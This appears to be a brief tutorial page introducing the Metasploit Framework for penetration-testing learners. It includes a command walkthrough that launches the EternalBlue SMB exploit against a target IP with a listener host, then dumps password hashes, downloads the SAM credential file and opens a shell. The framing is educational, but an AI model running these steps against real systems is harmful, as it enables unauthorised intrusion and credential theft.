Develop, test, and execute exploits against vulnerable targets. Metasploit provides hundreds of pre-built exploit modules, payloads, and post-exploitation tools for complete penetration testing.
The Metasploit Framework is an open-source penetration testing tool that makes hacking simple. It provides a complete toolkit for exploit development, delivery, and post-exploitation — all within a unified console interface (msfconsole).
Metasploit is used by penetration testers, SOC analysts, red teams, and security researchers worldwide. It is a core tool requirement for certifications including CEH · OSCP · CPENT · PNPT.
sudo msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
show options
run
# or
exploit -j
sysinfo
getuid
hashdump
download SAM
shell